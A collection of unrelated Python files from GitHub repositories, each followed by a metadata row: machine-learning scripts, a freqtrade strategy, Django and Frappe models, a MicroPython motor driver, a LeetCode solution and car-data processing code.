# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.feature_extraction import DictVectorizer
# 计算多个树,然后取多数为真
from sklearn.ensemble import RandomForestClassifier
data = pd.read_csv(r"learning\机器学习\自学算法\决策树算法\titanic.csv")
x = data[["Pclass", "Age", "Sex"]]
y = data["Survived"]
x["Age"].fillna(x["Age"].mean(), inplace=True)
# 数据集划分
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=.2)
# 特征工程
transfer = DictVectorizer()
x_train = transfer.fit_transform(x_train.to_dict(orient="records"))
x_test = transfer.fit_transform(x_test.to_dict(orient="records"))
# 换随机决策树分类器模型(先不传参数)
estimator = RandomForestClassifier()
param_grid = {
"n_estimators": [120, 200, 300, 500, 800, 1200],
"max_depth": [5, 8, 15, 25, 30]
}
# 交叉验证网格验证,求取一个最好的预测模型
estimator = GridSearchCV(estimator, param_grid=param_grid, cv=5)
estimator.fit(x_train, y_train)
# 预测值
score = estimator.score(x_test, y_test)
print(score)
# 看最好的模型设置
a = estimator.best_estimator_
print(a)
| LeroyK111/BasicAlgorithmSet | 集成学习算法/随机森林.py | 随机森林.py | py | 1,288 | python | en | code | 1 | github-code | 13 |
26854883355 | # from pytorch_pretrained_bert import BertTokenizer
import copy
from transformers import BertTokenizer
from tcn_test_7.data_tcn import *
from torchtext.vocab import build_vocab_from_iterator, Vocab
import pandas as pd
from sklearn.model_selection import KFold
from tcn_test_7.model import CpsTcnModel
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
parameters = Parameters()
def build_vocab_from_iterator_re(train_iter):
vocab = build_vocab_from_iterator(yield_tokens(train_iter), specials=['[PAD]', '[CLS]', '[SEP]'])
vocab.set_default_index(vocab["[PAD]"])
return vocab
def data_iter(dataset: MyDataset):
for index in range(0, dataset.__len__()):
yield dataset.__getitem__(index)
def yield_tokens(d_iter):
for _, text in d_iter:
if type(text) == float:
print(text)
continue
else:
yield tokenizer.tokenize(text)
def load_data():
_dir = '../data/tcn_test_data/tcn-model-data3.csv'
df = pd.read_csv(_dir)
df = df[df['DataCode'] == 5000]
df = df[df['Action_S'].notna()]
# 按组划分测试数据
grouped_data = df.groupby(['NewName'])
df_list = []
for idx, (name, group) in enumerate(grouped_data):
df_list.append(group)
return df_list
def get_vocab():
_dir = '../data/tcn_test_data/tcn-model-data3.csv'
df = pd.read_csv(_dir)
df = df[df['DataCode'] == 5000]
df = df[df['Action_S'].notna()]
df.reset_index(inplace=True)
dataset = MyDataset(df)
return build_vocab_from_iterator_re(data_iter(dataset))
# k折交叉验证
def k_fold_test(vocab: Vocab):
# 加载数据
df_list = load_data()
kf = KFold(n_splits=parameters.n_splits, shuffle=True, random_state=parameters.random_state)
for train_index, test_index in kf.split(df_list):
# 数据是df
train_data = pd.concat([df_list[i] for i in train_index])
test_data = pd.concat([df_list[i] for i in test_index])
train_data.reset_index(inplace=True)
test_data.reset_index(inplace=True)
# 数据是MyDataset
dataset_train = MyDataset(train_data)
dataset_test = MyDataset(test_data)
# 数据是Data
train_data = Data(dataset_train, vocab)
test_data = Data(dataset_test, vocab)
yield train_data, test_data
def generate_model(vocab):
model = CpsTcnModel(len(vocab), 11, [parameters.embedding_size] * 3)
model.to(parameters.device)
return model
if __name__ == '__main__':
pass
| xiaoyuerova/CPSProject | tcn_test_7/utils.py | utils.py | py | 2,532 | python | en | code | 0 | github-code | 13 |
23727083350 | # %%
from typing import List
class Solution:
def nearestValidPoint(self, x: int, y: int, points: List[List[int]]) -> int:
res = -1
minn = float("inf")
for i, point in enumerate(points):
x_, y_ = point
if x_ == x and minn > abs(y_ - y):
minn = abs(y_ - y)
res = i
if y_ == y and minn > abs(x_ - x):
minn = abs(x_ - x)
res = i
return res
| HXLH50K/Leetcode | 1779.py | 1779.py | py | 474 | python | en | code | 0 | github-code | 13 |
72630150417 | # pragma pylint: disable=missing-docstring, invalid-name, pointless-string-statement
# flake8: noqa: F401
# --- Do not remove these libs ---
import numpy as np # noqa
import pandas as pd # noqa
from pandas import DataFrame
from functools import reduce
from freqtrade.strategy import (BooleanParameter, CategoricalParameter, DecimalParameter,
IStrategy, IntParameter)
# --------------------------------
# Add your lib to import here
import talib.abstract as ta
import freqtrade.vendor.qtpylib.indicators as qtpylib
class DoubleBollingerStrategy(IStrategy):
buy_sma20_drop_ratio = DecimalParameter(0.6, 0.8, decimals=1, default=0.8, space="buy")
sell_sma5_higher_ratio = DecimalParameter(0.9, 1.3, decimals=1, default=1.3, space="sell")
# Strategy interface version - allow new iterations of the strategy interface.
# Check the documentation or the Sample strategy to get the latest version.
INTERFACE_VERSION = 2
# Minimal ROI designed for the strategy.
# This attribute will be overridden if the config file contains "minimal_roi".
minimal_roi = {
"0": 0.579,
"3653": 0.373,
"19881": 0.161,
"41906": 0
}
# Stoploss:
stoploss = -0.048
# Trailing stop:
trailing_stop = True
trailing_stop_positive = 0.294
trailing_stop_positive_offset = 0.385
trailing_only_offset_is_reached = True
# Optimal timeframe for the strategy.
timeframe = '1d'
# Run "populate_indicators()" only for new candle.
process_only_new_candles = False
# These values can be overridden in the "ask_strategy" section in the config.
use_sell_signal = True
sell_profit_only = False
ignore_roi_if_buy_signal = False
# Number of candles the strategy requires before producing valid signals
startup_candle_count: int = 30
# Optional order type mapping.
order_types = {
'buy': 'limit',
'sell': 'limit',
'stoploss': 'market',
'stoploss_on_exchange': False
}
# Optional order time in force.
order_time_in_force = {
'buy': 'gtc',
'sell': 'gtc'
}
plot_config = {
# Main plot indicators (Moving averages, ...)
'main_plot': {
'tema': {},
'sar': {'color': 'white'},
},
'subplots': {
# Subplots - each dict defines one additional plot
"MACD": {
'macd': {'color': 'blue'},
'macdsignal': {'color': 'orange'},
},
"RSI": {
'rsi': {'color': 'red'},
}
}
}
def informative_pairs(self):
"""
Define additional, informative pair/interval combinations to be cached from the exchange.
These pair/interval combinations are non-tradeable, unless they are part
of the whitelist as well.
For more information, please consult the documentation
:return: List of tuples in the format (pair, interval)
Sample: return [("ETH/USDT", "5m"),
("BTC/USDT", "15m"),
]
"""
return []
def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Adds several different TA indicators to the given DataFrame
Performance Note: For the best performance be frugal on the number of indicators
you are using. Let uncomment only the indicator you are using in your strategies
or your hyperopt configuration, otherwise you will waste your memory and CPU usage.
:param dataframe: Dataframe with data from the exchange
:param metadata: Additional information, like the currently traded pair
:return: a Dataframe with all mandatory indicators for the strategies
"""
# Momentum Indicators
# ------------------------------------
# MACD
macd = ta.MACD(dataframe)
dataframe['macd'] = macd['macd']
dataframe['macdhist'] = macd['macdhist']
bollinger = qtpylib.bollinger_bands(qtpylib.typical_price(dataframe), window=20, stds=2)
dataframe['bb_lowerband20'] = bollinger['lower']
bollinger = qtpylib.bollinger_bands(qtpylib.typical_price(dataframe), window=5, stds=2)
dataframe['bb_lowerband5'] = bollinger['lower']
dataframe['sma5'] = ta.SMA(dataframe, timeperiod=5)
return dataframe
def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
conditions = []
# GUARDS AND TRENDS
conditions.append(dataframe['close'] < dataframe['bb_lowerband20'])
conditions.append(dataframe['close'] > dataframe['bb_lowerband5'])
conditions.append(dataframe['bb_lowerband20'] > dataframe['bb_lowerband5'])
# conditions.append(dataframe['slowk'] < 25)
# conditions.append(dataframe['slowk'] > dataframe['slowd'])
conditions.append(dataframe['macdhist'].shift(1) < 0)
conditions.append(dataframe['macdhist'] > dataframe['macdhist'].shift(1))
conditions.append(dataframe['volume'] > 0)
if conditions:
dataframe.loc[
reduce(lambda x, y: x & y, conditions),
'buy'] = 1
return dataframe
def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Based on TA indicators, populates the sell signal for the given dataframe
:param dataframe: DataFrame populated with indicators
:param metadata: Additional information, like the currently traded pair
:return: DataFrame with buy column
"""
conditions = []
# GUARDS AND TRENDS
conditions.append(dataframe['close'] > dataframe['sma5'])
conditions.append(dataframe['volume'] > 0)
if conditions:
dataframe.loc[
reduce(lambda x, y: x & y, conditions),
'buy'] = 1
return dataframe
# dataframe.loc[
# (
# (dataframe['close'] > dataframe['sma5']*1.1) &
# (dataframe['volume'] > 0) # Make sure Volume is not 0
# ),
# 'sell'] = 1
# return dataframe
| ken2190/MyTradingStrategy | DoubleBollingerStrategy.py | DoubleBollingerStrategy.py | py | 6,364 | python | en | code | 0 | github-code | 13 |
14645694375 | from sqlalchemy import Column, ForeignKey, Identity, Integer, String, Table
from . import metadata
GelatoIdNumberReportJson = Table(
"gelato_id_number_reportjson",
metadata,
Column(
"dob",
GelatoDataIdNumberReportDate,
ForeignKey("GelatoDataIdNumberReportDate"),
comment="Date of birth",
nullable=True,
),
Column(
"error",
GelatoIdNumberReportError,
ForeignKey("GelatoIdNumberReportError"),
comment="Details on the verification error. Present when status is `unverified`",
nullable=True,
),
Column("first_name", String, comment="First name", nullable=True),
Column("id_number", String, comment="ID number", nullable=True),
Column("id_number_type", String, comment="Type of ID number", nullable=True),
Column("last_name", String, comment="Last name", nullable=True),
Column("status", String, comment="Status of this `id_number` check"),
Column("id", Integer, primary_key=True, server_default=Identity()),
)
__all__ = ["gelato_id_number_report.json"]
| offscale/stripe-sql | stripe_openapi/gelato_id_number_report.py | gelato_id_number_report.py | py | 1,079 | python | en | code | 1 | github-code | 13 |
10796414751 | from django.contrib import admin
from django.contrib.auth.models import Group
from django.contrib.sites.models import Site
from structure.models import Organization, Team, User, Contract, ContractOrganization, ContractTeam
from django.utils.translation import ugettext_lazy as _
class TeamAdmin(admin.ModelAdmin):
list_display = ['organization', 'name']
list_display_links = ['name']
list_filter = ['organization']
class UserAdmin(admin.ModelAdmin):
fieldsets = (
(_('Login'), {
'fields': ['username', 'password', 'is_active', 'last_login']
}),
(_('Basic information'), {
'fields': ['first_name', 'last_name', 'email', 'is_superuser', 'date_joined']
}),
(_('Teams'), {
'fields': ['teams']
}),
)
class ContractOrganizationInline(admin.TabularInline):
model = ContractOrganization
def formfield_for_foreignkey(self, db_field, request=None, **kwargs):
field = super(ContractOrganizationInline, self).formfield_for_foreignkey(db_field, request, **kwargs)
if db_field.name == 'default_team':
if request._obj_ is not None:
field.query_set = field.query_set.filter(organization=request._obj_.organization)
return field
class ContractAdmin(admin.ModelAdmin):
fields = ['name']
inlines = [ContractOrganizationInline]
def get_form(self, request, obj=None, **kwargs):
request._obj_ = obj
return super(ContractAdmin, self).get_form(request, obj, **kwargs)
admin.site.unregister(Site)
admin.site.unregister(Group)
admin.site.register(Organization)
admin.site.register(Team, TeamAdmin)
admin.site.register(User, UserAdmin)
admin.site.register(Contract, ContractAdmin)
| RocknRoot/LIIT | structure/admin.py | admin.py | py | 1,753 | python | en | code | 1 | github-code | 13 |
36458003126 | from __future__ import unicode_literals
import frappe, os, json
from frappe import _
from frappe.utils import cint, today, formatdate, get_timestamp
from frappe.utils.nestedset import NestedSet, get_root_of
from frappe.model.document import Document
import frappe.defaults
from frappe.cache_manager import clear_defaults_cache
from frappe.contacts.address_and_contact import load_address_and_contact
from past.builtins import cmp
import functools
from ifitwala_ed.accounting.doctype.account.account import get_account_currency
class School(NestedSet):
nsm_parent_field = 'parent_school'
def onload(self):
load_address_and_contact(self, "school")
def validate(self):
self.validate_abbr()
self.validate_parent_school()
def on_update(self):
NestedSet.on_update(self)
#if not frappe.db.sql("""SELECT name FROM `tabLocation` WHERE school=%s AND docstatus<2 LIMIT 1 """, self.name):
# self.create_default_location()
#if not frappe.db.get_value("Cost Center", {"is_group": 0, "school": self.name}):
# self.create_default_cost_center()
def on_trash(self):
NestedSet.validate_if_child_exists(self)
frappe.utils.nestedset.update_nsm(self)
def after_rename(self, olddn, newdn, merge=False):
frappe.db.set(self, "school_name", newdn)
clear_defaults_cache()
def validate_abbr(self):
if not self.abbr:
self.abbr = ''.join([c[0] for c in self.school_name.split()]).upper()
self.abbr = self.abbr.strip()
if self.get('__islocal') and len(self.abbr) > 5:
frappe.throw(_("Abbreviation cannot have more than 5 characters"))
if not self.abbr.strip():
frappe.throw(_("Abbreviation is mandatory"))
if frappe.db.sql("""SELECT abbr FROM `tabSchool` WHERE name!=%s AND abbr=%s""", (self.name, self.abbr)):
frappe.throw(_("Abbreviation {0} is already used for another school.").format(self.abbr))
def validate_parent_school(self):
if self.parent_school:
is_group = frappe.get_value('School', self.parent_school, 'is_group')
if not is_group:
frappe.throw(_("Parent School must be a group school."))
def create_default_location(self):
for loc_detail in [
{"location_name": self.name, "is_group": 1},
{"location_name": _("Classroom 1"), "is_group": 0, "location_type": "Classroom"},
{"location_name": _("Office 1"), "is_group": 0, "location_type": "Office"}]:
if not frappe.db.exists("Location", "{0} - {1}".format(loc_detail["location_name"], self.abbr)):
location = frappe.get_doc({
"doctype": "Location",
"location_name": loc_detail["location_name"],
"is_group": loc_detail["is_group"],
"organization": self.organization,
"school": self.name,
"parent_location": "{0} - {1}".format(_("All Locations"), self.abbr) if not loc_detail["is_group"] else "",
"location_type" : loc_detail["location_type"] if "location_type" in loc_detail else None
})
location.flags.ignore_permissions = True
location.flags.ignore_mandatory = True
location.insert()
def create_default_cost_center(self):
cc_list = [
{
'cost_center_name': self.name,
'school':self.name,
'is_group': 1,
'parent_cost_center':None
},
{
'cost_center_name':_('Main'),
'school':self.name,
'is_group':0,
'parent_cost_center':self.name + ' - ' + self.abbr
},
]
for cc in cc_list:
cc.update({"doctype": "Cost Center"})
cc_doc = frappe.get_doc(cc)
cc_doc.flags.ignore_permissions = True
if cc.get("cost_center_name") == self.name:
cc_doc.flags.ignore_mandatory = True
cc_doc.insert()
frappe.db.set(self, "default_cost_center", _("Main") + " - " + self.abbr)
frappe.db.set(self, "round_off_cost_center", _("Main") + " - " + self.abbr)
frappe.db.set(self, "depreciation_cost_center", _("Main") + " - " + self.abbr)
def set_default_accounts(self):
default_accounts = {
"default_cash_account": "Cash",
"default_bank_account": "Bank",
"round_off_account": "Round Off",
"accumulated_depreciation_account": "Accumulated Depreciation",
"depreciation_expense_account": "Depreciation",
"capital_work_in_progress_account": "Capital Work in Progress",
"asset_received_but_not_billed": "Asset Received But Not Billed",
"expenses_included_in_asset_valuation": "Expenses Included In Asset Valuation"
}
if self.enable_perpetual_inventory:
default_accounts.update({
"stock_received_but_not_billed": "Stock Received But Not Billed",
"default_inventory_account": "Stock",
"stock_adjustment_account": "Stock Adjustment",
"expenses_included_in_valuation": "Expenses Included In Valuation",
"default_expense_account": "Cost of Goods Sold"
})
if self.update_default_account:
for default_account in default_accounts:
self._set_default_account(default_account, default_accounts.get(default_account))
if not self.default_income_account:
income_account = frappe.db.get_value("Account", {"account_name": _("Sales"), "school": self.name, "is_group": 0})
if not income_account:
income_account = frappe.db.get_value("Account", {"account_name": _("Sales Account"), "school": self.name})
self.db_set("default_income_account", income_account)
if not self.default_payable_account:
self.db_set("default_payable_account", self.default_payable_account)
if not self.write_off_account:
write_off_acct = frappe.db.get_value("Account", {"account_name": _("Write Off"), "school": self.name, "is_group": 0})
self.db_set("write_off_account", write_off_acct)
if not self.exchange_gain_loss_account:
exchange_gain_loss_acct = frappe.db.get_value("Account", {"account_name": _("Exchange Gain/Loss"), "school": self.name, "is_group": 0})
self.db_set("exchange_gain_loss_account", exchange_gain_loss_acct)
if not self.disposal_account:
disposal_acct = frappe.db.get_value("Account", {"account_name": _("Gain/Loss on Asset Disposal"), "school": self.name, "is_group": 0})
self.db_set("disposal_account", disposal_acct)
def set_mode_of_payment_account(self):
cash = frappe.db.get_value('Mode of Payment', {'type': 'Cash'}, 'name')
if cash and self.default_cash_account and not frappe.db.get_value('Mode of Payment Account', {'school': self.name, 'parent': cash}):
mode_of_payment = frappe.get_doc('Mode of Payment', cash)
mode_of_payment.append('accounts', {'school': self.name, 'default_account': self.default_cash_account})
mode_of_payment.save(ignore_permissions=True)
def _set_default_account(self, fieldname, account_type):
if self.get(fieldname):
return
account = frappe.db.get_value("Account", {"account_type": account_type, "is_group": 0, "school": self.name})
if account:
self.db_set(fieldname, account)
@frappe.whitelist()
def enqueue_replace_abbr(school, old, new):
kwargs = dict(school=school, old=old, new=new)
frappe.enqueue('ifitwala_ed.school_settings.doctype.school.school.replace_abbr', **kwargs)
@frappe.whitelist()
def replace_abbr(school, old, new):
new = new.strip()
if not new:
frappe.throw(_("Abbr can not be blank or space"))
frappe.only_for("System Manager")
frappe.db.set_value("School", school, "abbr", new)
def _rename_record(doc):
parts = doc[0].rsplit(" - ", 1)
if len(parts) == 1 or parts[1].lower() == old.lower():
frappe.rename_doc(dt, doc[0], parts[0] + " - " + new)
def _rename_records(dt):
# rename is expensive so let's be economical with memory usage
doc = (d for d in frappe.db.sql("select name from `tab%s` where school=%s" % (dt, '%s'), school))
for d in doc:
_rename_record(d)
def get_name_with_abbr(name, school):
school_abbr = frappe.db.get_value("School", school, "abbr")
parts = name.split(" - ")
if parts[-1].lower() != school_abbr.lower():
parts.append(school_abbr)
return " - ".join(parts)
@frappe.whitelist()
def get_children(doctype, parent=None, school=None, is_root=False):
if parent is None or parent == "All Schools":
parent = ""
return frappe.db.sql("""
SELECT
name as value,
is_group as expandable
FROM
`tab{doctype}` comp
WHERE
ifnull(parent_school, "")={parent}
""".format(
doctype=doctype,
parent=frappe.db.escape(parent)
), as_dict=1)
@frappe.whitelist()
def add_node():
from frappe.desk.treeview import make_tree_args
args = frappe.form_dict
args = make_tree_args(**args)
if args.parent_school == 'All Schools':
args.parent_school = None
frappe.get_doc(args).insert()
| fderyckel/ifitwala_ed | ifitwala_ed/school_settings/doctype/school/school.py | school.py | py | 8,359 | python | en | code | 18 | github-code | 13 |
14906880013 | from micropython import const
import uos as os
import utime as time
import machine
import ustruct
import i2c_bus, module
M5GO_WHEEL_ADDR = const(0x56)
MOTOR_CTRL_ADDR = const(0x00)
ENCODER_ADDR = const(0x04)
motor1_pwm = 0
motor2_pwm = 0
def dead_area(amt, low, low_up, high, high_up):
if amt > low_up and amt < high_up:
amt = 0
elif amt > high_up and amt < high:
amt = high
elif amt > low and amt < low_up:
amt = low
return amt
def constrain(amt, low, high):
if amt < low:
return low
if amt > high:
return high
return amt
class Lego_Motor:
def __init__(self, port):
self.i2c = i2c_bus.get(i2c_bus.M_BUS)
self._available()
self._available()
self.port = port
self._position = 0
self.updateTime = 0
def _available(self):
if self.i2c.is_ready(M5GO_WHEEL_ADDR) or self.i2c.is_ready(M5GO_WHEEL_ADDR):
pass
else:
raise module.Module("Bala maybe not connect")
def stop(self):
self.set_pwm(0)
def set_pwm(self, pwm):
global motor1_pwm, motor2_pwm
if self.port == 1:
motor1_pwm = pwm
else:
motor2_pwm = pwm
buf = ustruct.pack('<hh', int(motor1_pwm), int(motor2_pwm))
self.i2c.writeto_mem(M5GO_WHEEL_ADDR, MOTOR_CTRL_ADDR, buf)
def read_encoder(self):
self.position_update()
return self._position
def _read_encoder(self):
buf = bytearray(4)
self.i2c.readfrom_mem_into(M5GO_WHEEL_ADDR, ENCODER_ADDR, buf)
encoder_buf = tuple(ustruct.unpack('<hh', buf))
if self.port == 1:
return encoder_buf[0]
else:
return encoder_buf[1]
def position_update(self):
if time.ticks_ms() - self.updateTime > 20:
self.updateTime = time.ticks_ms()
self._position = self._position + self._read_encoder()
def run_to(self, pos, speed):
error_last_1 = 0
pwm_last = [255, 255, 255, 255]
self.position_update()
_distance = pos
pwm_now = 0
kp = 0.85
kd = 7.0
tick_now = time.ticks_ms()
num = 0
while True:
time.sleep_ms(1)
if time.ticks_ms() - tick_now > 10:
tick_now = time.ticks_ms()
error = _distance - self.read_encoder()
pwm_now = kp*error + kd*(error-error_last_1)
pwm_now = constrain(pwm_now, -speed, speed)
pwm_now = dead_area(pwm_now, -100, -3, 100, 3)
pwm_now = -pwm_now
error_last_1 = error
pwm_last = pwm_last[1:4]
if -15 < error < 15:
num += 1
else:
num = 0
if num > 10:
self.set_pwm(0)
break
self.set_pwm(pwm_now)
pwm_last.append(pwm_now)
if pwm_last == [0, 0, 0, 0]:
break
def run_distance(self, distance=500, speed=255):
error_last_1 = 0
pwm_last = [255, 255, 255, 255]
_distance = self.read_encoder() + distance
pwm_now = 0
kp = 0.85
kd = 7.0
tick_now = time.ticks_ms()
num = 0
while True:
time.sleep_ms(1)
if time.ticks_ms() - tick_now > 10:
tick_now = time.ticks_ms()
self.position_update()
error = _distance - self.read_encoder()
pwm_now = kp*error + kd*(error-error_last_1)
pwm_now = constrain(pwm_now, -speed, speed)
pwm_now = dead_area(pwm_now, -100, -3, 100, 3)
pwm_now = -pwm_now
error_last_1 = error
pwm_last = pwm_last[1:4]
if -15 < error < 15:
num += 1
else:
num = 0
if num > 10:
self.set_pwm(0)
break
self.set_pwm(pwm_now)
pwm_last.append(pwm_now)
if pwm_last == [0, 0, 0, 0]:
break
def deinit(self):
pass
class Lego:
def __init__(self):
self.M1 = Lego_Motor(1)
self.M2 = Lego_Motor(2)
def deinit(self):
self.M1.deinit()
self.M2.deinit() | BradenM/micropy-stubs | packages/m5flowui/v1.4.0/generic/frozen/flowlib/modules/_lego.py | _lego.py | py | 4,451 | python | en | code | 26 | github-code | 13 |
40597601185 | import yaml
from os import path
rdir = path.dirname(path.realpath(__file__)) + '/'
refs = yaml.load(open(rdir + 'BH76_ref_energies.yaml','r'), Loader=yaml.Loader)
ts_d = {}
for ibh, abh in enumerate(refs):
for asys in refs[abh]['Stoich']:
if refs[abh]['Stoich'][asys] > 0:
if asys not in ts_d:
ts_d[asys] = [abh]
else:
ts_d[asys].append(abh)
def s2_to_s(ssq):
return (-1. + (1. + 4*ssq)**(0.5))/2.
wpath = './results_aug-cc-pvqz/HF/HF_BH76/'
ostr = 'Transition state, Computed <S^2>, Computed S, Input S , PE (%), BH index 1, BH index 2,...\n'
for asys in ts_d:
got_two_s = False
got_res = False
with open(wpath + asys + '/inp.txt','r') as tfl:
for arow in tfl:
if '2S' in arow:
ideal_s = float(arow.split('=')[-1].strip())/2.
got_two_s = True
elif 'restricted' in arow:
tmp = arow.split('=')[-1].strip().lower()
if tmp[0] == 't' or tmp == 'true':
LR = True
elif tmp[0] == 'f' or tmp == 'false':
LR = False
got_res = True
if got_two_s and got_res:
break
if LR:
ostr += '{:}, 0, 0, 0, 0'.format(asys)
else:
with open(wpath + asys + '/' + asys + '.txt','r') as tfl:
for arow in tfl:
if '<S^2>' in arow:
ssq = float(arow.split('<S^2> =')[-1].split('2S+1')[0])
comps = s2_to_s(ssq)
ostr += '{:}, {:.4f}, {:.4f}, {:}, {:.4f}'\
.format(asys,ssq,comps,ideal_s, 100*(comps/ideal_s - 1.))
break
for anindx in ts_d[asys]:
ostr += ', {:}'.format(anindx)
ostr += '\n'
with open('./spin_contam.csv','w+') as tfl:
tfl.write(ostr)
| esoteric-ephemera/BH76-PySCF-PyFLOSIC | get_s_squared.py | get_s_squared.py | py | 1,885 | python | en | code | 0 | github-code | 13 |
14739419445 | #Uses python3
import sys
from multiprocessing import Queue
import queue
import math
import heapq
class PriorityQueue(Queue):
def _put(self, item):
data, priority = item
self._insort_right((priority,data))
def _get(self):
return self.queue.pop(0)
def _insort_right(self, x):
"""Insert item x in list, and keep it sorted assuming a is sorted.
If x is already in list, insert it to the right of the rightmost x.
"""
a = self.queue
lo = 0
hi = len(a)
while lo < hi:
mid = (lo + hi) / 2
if x[0] < a[mid][0]: hi = mid
else: lo = mid + 1
a.insert(lo, x)
def distance(adj, cost, s, t):
#write your code here
distTo = [math.inf] * len(adj)
distTo[s] = 0
prev = [None] * len(adj)
pq = PriorityQueue()
for i in range(len(distTo)):
pq.put((i, distTo[i]))
while not pq.empty():
(distTo[u], u) = pq.get()
#print(u)
for w in cost[u]:
#print(w)
for v in adj[u]:
if distTo[v] > distTo[u] + w:
distTo[v] = distTo[u] + w
prev[v] = u
#print(distTo[v])
pq.put((distTo[v], v))
if distTo[t] == math.inf:
return -1
print(distTo)
print(prev)
return distTo[t]
if __name__ == '__main__':
file1 = open("01dijk.txt", "r")
input = file1.read()
#input = sys.stdin.read()
data = list(map(int, input.split()))
n, m = data[0:2]
data = data[2:]
edges = list(zip(zip(data[0:(3 * m):3], data[1:(3 * m):3]), data[2:(3 * m):3]))
data = data[3 * m:]
adj = [[] for _ in range(n)]
cost = [[] for _ in range(n)]
for ((a, b), w) in edges:
adj[a - 1].append(b - 1)
cost[a - 1].append(w)
s, t = data[0] - 1, data[1] - 1
print(adj)
print(cost)
print(distance(adj, cost, s, t))
| price-dj/Algorithms_On_Graphs | Week4/pset4/dijkstrav6.py | dijkstrav6.py | py | 1,963 | python | en | code | 0 | github-code | 13 |
19253451866 | import sqlite3
import json
from sqlacodegen.codegen import CodeGenerator
from sqlalchemy import create_engine, MetaData
import sqlalchemy_utils
import pandas as pd
import pickle
import numpy as np
import re
import unittest
def trim_trim(trim):
trimming = re.findall(r'\b[A-Za-z]+\b', trim)
trimming = [x.upper() for x in trimming]
if trimming:
return ' '.join(trimming)
return np.nan
class MyFunctionTestCase(unittest.TestCase):
def test_scenario1(self):
input = 'Sportback RFS 13 מווו'
expected_output = ['SPORTBACK', 'RFS'] # Define the expected output
result = trim_trim(input)
self.assertEqual(result, expected_output)
'''def test_scenario2(self):
input = ... # Define the input for this scenario
expected_output = ... # Define the expected output
result = my_function(input)
self.assertEqual(result, expected_output)'''
# Add more test scenarios as needed
'''if __name__ == '__main__':
unittest.main()'''
def trim_trim(trim):
trimming = re.findall(r'\b[A-Za-z]+\b', trim)
trimming = [x.upper() for x in trimming]
if trimming:
return ' '.join(trimming)
return np.nan
with open('hebrew_fields.pkl', 'rb') as pickle_file:
hebrew_fields = pickle.load(pickle_file)
with open('audi_datagov.pkl', 'rb') as car_file:
df_datagov = pickle.load(car_file)
with open('hebrew_fields.pkl', 'rb') as pickle_file:
hebrew_fields = pickle.load(pickle_file)
file_name = 'audi_datagov.db'
conn = sqlite3.connect(file_name)
c = conn.cursor()
c.execute("SELECT name FROM sqlite_master WHERE type='table';")
table_names = c.fetchall()
c.execute("SELECT * FROM data_gov")
data = c.fetchall()
data_columns = [desc[0] for desc in c.description]
df1 = pd.DataFrame(data, columns=data_columns)
file_name = 'audi_icar3.sql'
conn = sqlite3.connect(file_name)
c = conn.cursor()
c.execute("SELECT * FROM cars")
#cursor.execute("SELECT name FROM sqlite_master WHERE type='table'")
#tables = cursor.fetchall()
rows = c.fetchall()
'''a = rows[0][3]
if isinstance(a, bytes):
a2 = 'yes'
else:
a2 = 'no'''
icar_sql = [[pickle.loads(field) if isinstance(field, bytes) else field for field in car] for car in rows]
icar_dict = [x[2] for x in icar_sql]
icar_general_model = [x[0] for x in icar_sql]
icar_exact_model = [x[1] for x in icar_sql]
icar_names = list(icar_dict[0].keys())
icar_values = [list(car.values()) for car in icar_dict]
left_on_trim = ['shnat_yitzur', 'koah_sus', 'nefah_manoa', 'mispar_dlatot', 'hanaa_nm', 'automatic_ind', 'mispar_moshavim', 'delek_cd', 'kinuy_mishari', 'ramat_gimur']
right_on_trim = ['year', 'power', 'capacity', 'doors', 'hanaa_nm', 'automatic_ind', 'mispar_moshavim', 'delek_cd', 'general_model', 'trim']
left_on = ['shnat_yitzur', 'koah_sus', 'nefah_manoa', 'mispar_dlatot', 'hanaa_nm', 'automatic_ind', 'mispar_moshavim', 'delek_cd', 'kinuy_mishari']
right_on = ['year', 'power', 'capacity', 'doors', 'hanaa_nm', 'automatic_ind', 'mispar_moshavim', 'delek_cd', 'general_model']
#int_columns = right_on[:4] + right_on[5:]
#a = pd.to_numeric(df2['capacity'])
#a.astype(int)
#df2_types = [np.int64, np.int64, int, np.int64, np.int64, np.int64, np.int64]
#df2[int_columns] = df2[int_columns].applymap(lambda x: pd.to_numeric(x))
#df2 = df2.drop('trim', axis=1)
df2 = df2.drop('additional_safety_equipment', axis=1)
trim = df2['trim'].apply(trim_trim)
trim2 = df['trim']
trim2 = [trim_trim(trim) for trim in trim2]
df2['trim'] = trim
b = 5
#df2_type_dict = dict(zip(df2_int_columns, df2_types))
#df2.astype(df2_type_dict)
#[df2[column].astype(np.int64) for column in df2_int_columns]
# Perform initial merge of df1 and df3 based on left_on and right_on columns
#merge1 =
merged_df = pd.merge(df1, df2, left_on=left_on, right_on=right_on, how='left')
unique_df = merged_df.drop_duplicates(keep='last')
unique_df.dropna(inplace=True)
b=5
'''# Drop rows with NaN values in merge_columns from merged_df
merged_df.dropna(subset=merge_columns, inplace=True)
# Drop duplicate rows from merged_df based on left_index column, keep the first occurrence
merged_df.drop_duplicates(subset='left_index', keep='first', inplace=True)
# Reset index in merged_df
merged_df.reset_index(drop=True, inplace=True)
# Create a new column 'matching_index' in merged_df containing the index of the first matching row, if any
merged_df['matching_index'] = merged_df['left_index']
# Drop rows without a match (NaN values in right_index)
merged_df.dropna(subset=['right_index'], inplace=True)
# Reset index in merged_df
merged_df.reset_index(drop=True, inplace=True)
# Convert the 'matching_index' column to integer type
merged_df['matching_index'] = merged_df['matching_index'].astype(int)
# Concatenate the appropriate row from df2 to each remaining row in merged_df
merged_df = pd.concat([merged_df, df2.loc[merged_df['matching_index']]])
# Reset index in merged_df
merged_df.reset_index(drop=True, inplace=True)
# Perform initial merge of df1 and df3 based on left_on and right_on columns
merged_df1 = pd.merge(df1, df3, left_on=left_on, right_on=merge_columns, left_index=True, how='left')
# Drop rows with NaN values in merge_columns from merged_df1
merged_df1.dropna(subset=merge_columns, inplace=True)
# Drop duplicate rows from merged_df1 based on left_index column, keep the first occurrence
merged_df1.drop_duplicates(subset='index_col', keep='first', inplace=True)
# Reset index in merged_df1
merged_df1.reset_index(drop=True, inplace=True)
# Concatenate the appropriate row from df2 to each remaining row in merged_df1
